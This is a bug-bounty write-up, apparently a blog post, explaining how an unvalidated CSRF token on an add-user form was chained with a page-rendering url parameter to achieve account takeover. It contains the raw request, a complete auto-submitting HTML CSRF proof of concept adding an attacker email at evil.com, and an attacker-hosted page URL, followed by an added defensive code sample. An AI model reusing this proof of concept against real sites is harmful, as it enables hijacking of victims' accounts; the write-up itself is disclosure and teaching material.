Cross Site Request Forgery Critical Exploitable IN Infected Site?

Hello again

In one private program on HackerOne I found a Cross Site Request Forgery vulnerability, but not the usual kind.

I turned it into a critical CSRF by mixing it with

HTTP PARAMETER POLLUTION

Let's write up how 🤔

This is the request that adds another user to the account, which grants that user access to the victim's account:

POST /users/settings/ HTTP/1.1
Host: evilwite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Upgrade-Insecure-Requests: 1

ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com&first_name=mesbah&last_name=mesbah&phone=01032764848&csrf_token=PdsLuVDyQUbQZjbnl4R70oGTUIyKJfl7dHXW0j0jd4H7tAJR%2Fe%2F2P7%2B6akjtBH7thiGbmGhidK29eDguPn2dYg%3D%3D

Okay, what's the problem here? The csrf_token is sent, but the server does not validate it at all.


User is now added


Okay, that was an easy CSRF. What now? Create a CSRF PoC, sure:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://x.website.infected/settings/users" method="POST">
<input type="hidden" name="ThisAction" value="AddUser" />
<input type="hidden" name="NextAction" value="Insert" />
<input type="hidden" name="new&#95;user&#95;email" value="attackeremail&#64;evil&#46;com" />
<input type="hidden" name="first&#95;name" value="mesbah" />
<input type="hidden" name="last&#95;name" value="mesbah" />
<input type="hidden" name="phone" value="01032764848" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

But while searching through the proxy HTTP history, by accident

I found a parameter named url on the site: whatever I put in it is printed back in the response.

Of course I tested for Cross Site Scripting, but it didn't work.

It took me a few minutes of thinking.

I found that I could put another website in this parameter. An example of this parameter:

https://x.website.infected/public/repositry?url=https://y.website.infected/

Okay, please think with me now.

I got a free hosting site and uploaded a file to it.

Now we change the parameter from the original website to my 000webhost site:

https://x.website.infected/public/repositry?url=http://5000mesbah.000webhost.com/csrf.html


Oh my God, it worked: the site rendered my page.

What's useful about that?

Step 2: I added JS code with a

window.onload function to submit the request.

Now it's a full account takeover,

served by the infected site itself, not by the attacker's domain.
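As an added defender's example (not code from the write-up or the program), here is what the two server-side checks missing from this chain could look like: a constant-time comparison of the submitted csrf_token against the token bound to the session, and an allow-list for the url parameter so only the site's own hosts can be fetched and rendered. The host names follow the write-up's redacted placeholders, and the session token value is constructed for the test.

```python
import hmac
from urllib.parse import urlparse, parse_qs

# Hypothetical allow-list for the "url" parameter: only the site's own hosts.
# Placeholder names in the spirit of the write-up's redacted domains.
ALLOWED_URL_HOSTS = {"x.website.infected", "y.website.infected"}


def csrf_token_is_valid(session_token, submitted_token):
    """The check the /users/settings/ endpoint was missing: the csrf_token in
    the body must match the token bound to the victim's session.
    compare_digest keeps the comparison constant-time."""
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token, submitted_token)


def fetch_url_is_allowed(url):
    """Allow-list check for /public/repositry?url=...: only https URLs whose
    host is one of the site's own hosts may be fetched and rendered, so an
    attacker-hosted csrf.html can no longer be served from the site's origin."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False
    host = (parsed.hostname or "").lower()
    return host in ALLOWED_URL_HOSTS


def check_add_user_request(body, session_token):
    """Gate for the AddUser form body (application/x-www-form-urlencoded).
    Returns (allowed, reason). A forged form that omits csrf_token, or carries
    a token that does not match the session, is rejected before any user is added."""
    params = parse_qs(body, keep_blank_values=True)
    submitted = params.get("csrf_token", [""])[0]
    if not csrf_token_is_valid(session_token, submitted):
        return False, "csrf token missing or does not match session"
    if params.get("ThisAction", [""])[0] != "AddUser":
        return False, "unexpected action"
    return True, "ok"
```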

🤩🤩🤩🤩

It's even better.

And wait for a new writeup from me.

Vulnerability reported

Vulnerability triaged

Vulnerability: the site has not paid yet 😞😞😞😞

Good Bye

Written by

Web Penetration Tester, Red Team member via Synack, worked at Huawei
